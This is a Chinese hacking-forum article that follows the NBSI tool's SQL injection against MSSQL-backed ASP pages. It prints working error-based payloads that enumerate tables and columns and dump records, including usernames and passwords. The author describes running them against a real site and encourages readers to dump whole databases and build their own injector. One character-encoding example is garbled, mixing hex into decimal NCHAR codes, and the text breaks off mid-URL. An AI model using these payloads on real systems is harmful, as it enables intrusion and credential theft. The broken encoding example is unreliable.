NBSI 注入分析跟踪报告（MSSQL篇）

NBSI 注入分析跟踪报告（MSSQL篇）

来源：情感网络 作者:Softbug

前言：

编写一个好的工具不容易，编写一个注入工具更是不容易。这篇文章系统通过跟踪NBSI的注入过程来分析牛人的测试思路。对手工分析刺探很有帮助。仔细跟踪NBSI的刺探结果也是对注入攻击的一种欣赏。

首先我们找到了一家IT站点做测试，测试的目录仅仅是为了跟踪NBSI的刺探思路，不曾对该网站进行过恶意的破坏！

1 注入点的探测

假设注入点为：http://www.xxx.com/zhuru.asp?id=1


那么NBSI会首先试探这样的连接：http://www.xxx.com/zhuru.asp?id=1 and user%2bchar(124)>0


最开始不明白为什么要叫个Char(124),这个值其实是个"|"符号。后面我们会说到。


当然了，这样IIS会报错，返回一个500的内部错误号码，也许作者就以此为根据吧。


3 猜解表名


跟踪发现，作者用一句话就完成一个表名的猜解，效率的确很高。具体的表名猜测代码为：


And (select Top 1 cast(name as varchar(8000)) from(select Top 1 id,name from sysobjects where xtype=char(85) order by id) T order by id desc)>0


看见红色的1了吗？这个就是猜测数据表的表名数值！如果是第一个表，当然就为1，如果是第一个表那么这个1就改为2就是了，以此类推。


那么我们如何决定表名已经猜测完毕了呢？这个简单，跟踪发现，只要 表名数值 X 和 X+1 个表返回的表名值是一样的表示猜测完毕了。


5 猜测列名


跟踪发现，作者也是用一句话就完成了一个表名的猜解。可能这个就是对MSSQL猜解的好处吧！换了Access可能也是要一个字母一个字母的去猜。具体的猜解列名的代码为：


And (select Top 1 cast(name as varchar(8000)) from (select Top 1 colid,name From syscolumns where id = OBJECT_ID(NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)) Order by colid) T Order by colid desc)>0


看到红色的1了吗？这个表示我们要猜测列名的序列值。换成2就表示要猜测第2个列名。判断结束的方式和判断表名结束的方式一样。


注意一点：

NCHAR(78)%2BNCHAR(101)%2BNCHAR(119)%2BNCHAR(115)%2BNCHAR(95)%2BNCHAR(85)%2BNCHAR(115)%2BNCHAR(101)%2BNCHAR(114)

为了饶过 符号的限制，作者尽量使用Nchar来连接表名的字符串值。上面这一传实际上就代表了一个表的字符串值。括号里面的数字是字符的ASC码。


举例：

如果我们要猜测xfiletd这个表名，我们只要用HUIE的插件换算一下就OK了！

见下图：



我们就得到了下面字符：

nchar(78)%2bnchar(66)%2bnchar(69)%2bnchar(6C)%2bnchar(65)%2bnchar(74)%2bnchar(75)

呵呵！速度快吧！

6 猜解数据


下面我们来看看NBSI是如何猜解数据的，按道理应该是"暴"，让我们期待一下牛人是如何暴数据的。

1） 得到字段的记录个数

And%20(select%20cast(Count(1)%20as%20varchar(8000))%2Bchar(97)%20From%20[News_Style]%20where%201=1)>0

其中红色的News_Style代表我们要猜解的表名，这里作者用到了一个常用的暴表技巧。我们得到了字段数以后，字段是个INT类型的值，他和0比较是不会发生类型转换错误的。换句话说，记录就不会自动的"招"。如果我们在和0比较的时候实现就把把它和Char(97)//字符a 相连接，那么我们得到的就会是个字符串了。和零比较的时候自然就暴出了"记录个数"+a 这样一个数值来。现在大家该明白为什么第一步的刺探要加一个"|"符号了吧！谜底解开了。



2） 得到字段的值


得到了记录个数，然后不断的循环而暴出字段的值。还好，作者没用什么奇特的招数。作者的代码为：

And (select Top 1 isNull(cast([sName] as varchar(8000)),char(32))%2Bchar(124) From (select Top 9 sName From [News_Style] where 1=1 Order by sName) T Order by sName desc)>0

红色的news_style我不多解释了，就是要猜解的数据表名，绿色的9表示要得到第就 sname字段的第9条记录的值。循环几次，呵呵！数据就到手了。

大家注意一下：char(124)这个东西。它的目的也在于把数据统统转化为字符串类型然后和int类型进行比较，然后暴出数据。道理如前所述！这就是NBSI为什么在得到的字段里面有"|"这样的值的原因。作者也许懒得处理罢了。：-）



看到了吗？后面都有"|"符号。

3） 关于双数据和N个数据的猜测


大家也许觉得，NBSI猜测数据字段的值的速度很快，跟踪分析了一下，的确不错。假设我们要猜测一个表的2个字段的值。那么我们该如何写代码呢？


NBSI的代码是这样写的：

第一步还是用１）的办法得到记录个数。

第二步就用：

And (select Top 1 isNull(cast([UserName] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([PassWord] as varchar(8000)),char(32)) From (select Top 1 UserName,PassWord From [News_User] where 1=1 Order by UserName,PassWord) T Order by UserName desc,PassWord desc)>0

（注意看|符号隔开了2个数值）

News_user是一个表名，Char(124)我就不多解释了。大家可以照着猫画虎，把上面的语句和2）里面的语句进行对比一下。具有基本地球人功能的我想都能看出来作者是怎么暴多字段值的了吧。如果你高兴，一次把数据库的值都暴出来都无所谓。这里间接的提醒一下大家：暴一个字段的值的网络开销和暴全部的值的网络开销差不了多少，下次玩NBSI的时候记得把所有的值都挂上吧！J


总结：有希望完成自己VB代码的朋友可能根据我们分析的结果编写程序，你们也将拥有属于自己的NBSI。如今的HUIE就具有这样的功能。希望大家去www.hack0.net访问。

后序：
写程序最重要的就是编程思路，也许你看到的只是编写一个好程序的部分细节罢了。大家有没意思到，NBSI是如何判断网站能否注入的呢？其实单靠SQL暴错只是一个思路罢了。NBSI给我们展现的两种思路是：


2 判断IIS的报头 以正常返回200,101 为基础，如果返回500则表示出现了错误。


3 逐字逐句的判断IIS的返回信息，然后自己对比是否有注入的可能性！（因为，有些网站返回的HTML信息量是非常大的！用程序判断仍然很费时间，不推荐）


更多的东西，其实我们还需要学习。不光是暴库，搞注入。

NBSI其实是一个项目很大的软件，我们的分析是完全建立在IIS的错误提示开启的状态下完成的。 而且是使用的"数字型"的注入方式。局限是有点，我们会继续跟踪以完全挖掘NBSI的注入思路的。Access注入的判断也许就是一个难恼人的编程项目。换了是你，你能编写出来吗？NBSI还有很多地方不健全，看了我们的文章也许你有办法可以编写出更牛的NB出来。有兴趣的朋友可以继续关注我们的NBSI分析报告。更欢迎有志之人能把编写出自己的网络小插件发到www.h